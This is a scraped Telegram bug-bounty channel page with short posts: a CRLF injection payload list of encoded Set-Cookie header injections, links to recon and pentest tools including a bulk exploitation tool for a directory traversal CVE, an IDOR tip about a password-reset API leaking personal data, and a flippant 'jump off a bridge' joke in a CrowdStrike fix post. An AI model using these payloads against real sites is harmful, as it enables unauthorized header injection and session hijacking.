Brut Security
15.2K subscribers
966 photos
76 videos
292 files
1.01K links
โœ…DM: @wtf_brut
๐Ÿ›ƒWhatsApp: https://wa.link/brutsecurity
๐ŸˆดTraining: https://brutsecurity.com
๐Ÿ“จMail: info@brutsec.com
Download Telegram
Bug Bounty Tip

CRLF Injection Attack Payload List

๐Ÿ”น /%%0a0aSet-Cookie:crlf
๐Ÿ”น /%0aSet-Cookie:crlf
๐Ÿ”น /%0d%0aSet-Cookie:crlf
๐Ÿ”น /%0dSet-Cookie:crlf
๐Ÿ”น /%23%0aSet-Cookie:crlf
๐Ÿ”น /%23%0d%0aSet-Cookie:crlf
๐Ÿ”น /%23%0dSet-Cookie:crlf
๐Ÿ”น /%25%30%61Set-Cookie:crlf
๐Ÿ”น /%25%30aSet-Cookie:crlf
๐Ÿ”น /%250aSet-Cookie:crlf
๐Ÿ”น /%25250aSet-Cookie:crlf
๐Ÿ”น /%2e%2e%2f%0d%0aSet-Cookie:crlf
๐Ÿ”น /%2f%2e%2e%0d%0aSet-Cookie:crlf
๐Ÿ”น /%2F..%0d%0aSet-Cookie:crlf
๐Ÿ”น /%3f%0d%0aSet-Cookie:crlf
๐Ÿ”น /%3f%0dSet-Cookie:crlf
๐Ÿ”น /%u000aSet-Cookie:crlf
๐Ÿ”น /%E5%98%8D%E5%98%8ASet-Cookie:crlf

#bugbounty #cybersecurity #ethicalhacking
โค9๐Ÿ‘5
๐Ÿ‘3
How to fix the Crowdstrike thing:

1. Boot Windows into safe mode
2. Go to C:\Windows\System32\drivers\CrowdStrike
3. Delete C-00000291*.sys
4. Repeat for every host in your enterprise network including remote workers
5. If you're using BitLocker jump off a bridge
๐Ÿ‘‰ InfiSCA: Your Open-Source Vulnerability Scanner
InfiSCA is an open-source software composition analysis (SCA) tool. Think of it as a security guard for your software supply chain.

๐Ÿ”—Download :
https://github.com/Infisical/infisical
๐Ÿ‘7โค1๐Ÿ”ฅ1
๐Ÿ“ฎJScripter - A noob-friendly JavaScript scraper based on #GAU and #hakrawler. Options to scan a single URL or multiple URLs from a list. Uses threads, saves files into a directory, and de-duplicates during saving.

โœ…Download-
https://github.com/ifconfig-me/JScripter

#BugBounty #bugbountytips
๐Ÿ”ฅ8๐Ÿ‘1
๐Ÿš€ Apepe - Mobile application pentesting๐Ÿš€

๐Ÿ•ต๏ธ Apepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...

๐Ÿงพ Source - github.com/oppsec/Apepe
โค7
Do Sign Up for Top Notch Results ๐Ÿ˜Ž
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿคฃ15๐Ÿ˜3โค2๐Ÿคฏ1
Best App For Sql Injection
Link -
https://github.com/darknethaxor/DH-HackBar
๐Ÿ‘4๐Ÿ†’3
๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ
Drop Your Suggestions for Resources
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿคฃ5๐Ÿ˜2๐Ÿ™1
๐Ÿคฃ9
This media is not supported in your browser
VIEW IN TELEGRAM
BBRF-Client: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.

๐Ÿ˜š https://github.com/honoki/bbrf-client/
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘2๐Ÿ‘1
๐Ÿ‘3
IDOR in Reset Password

When the user reset his password the application make an API request to make sure that username exists. If exist, it will come back with Personal Identifying Information (PII) in the response [Full name,Email,Phone number].

By:
@Maakthon

#bugbountytips
โค11๐Ÿ‘4
๐Ÿšจ CVE-2024-40348 ๐Ÿšจ

๐Ÿ‘‰ This is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.

๐Ÿ”— Download :
https://github.com/bigb0x/CVE-2024-40348
๐Ÿ”ฅ2โค1
Advanced SQL Injection Techniques by nav1n0x.pdf
1 MB
Advanced SQL Injection Techniques
โค7๐Ÿ”ฅ1
๐ŸคฉHey everyone, thanks for being part of this awesome community!
๐ŸธIf you enjoy my content and want to support me, you can buy me a coffee on Ko-fi: https://ko-fi.com/brutxninja โ˜•๏ธ !
Please open Telegram to view this post
VIEW IN TELEGRAM
โค2๐Ÿค1
Brut Security pinned ยซ๐ŸคฉHey everyone, thanks for being part of this awesome community! ๐ŸธIf you enjoy my content and want to support me, you can buy me a coffee on Ko-fi: https://ko-fi.com/brutxninja โ˜•๏ธ !ยป
๐Ÿš€A Practical Guide to Starting Your Cybersecurity Career in India๐Ÿš€

โœˆ๏ธLink- https://ko-fi.com/post/A-Practical-Guide-to-Starting-Your-Cybersecurity-C-L4L410XGKI
Please open Telegram to view this post
VIEW IN TELEGRAM
โค1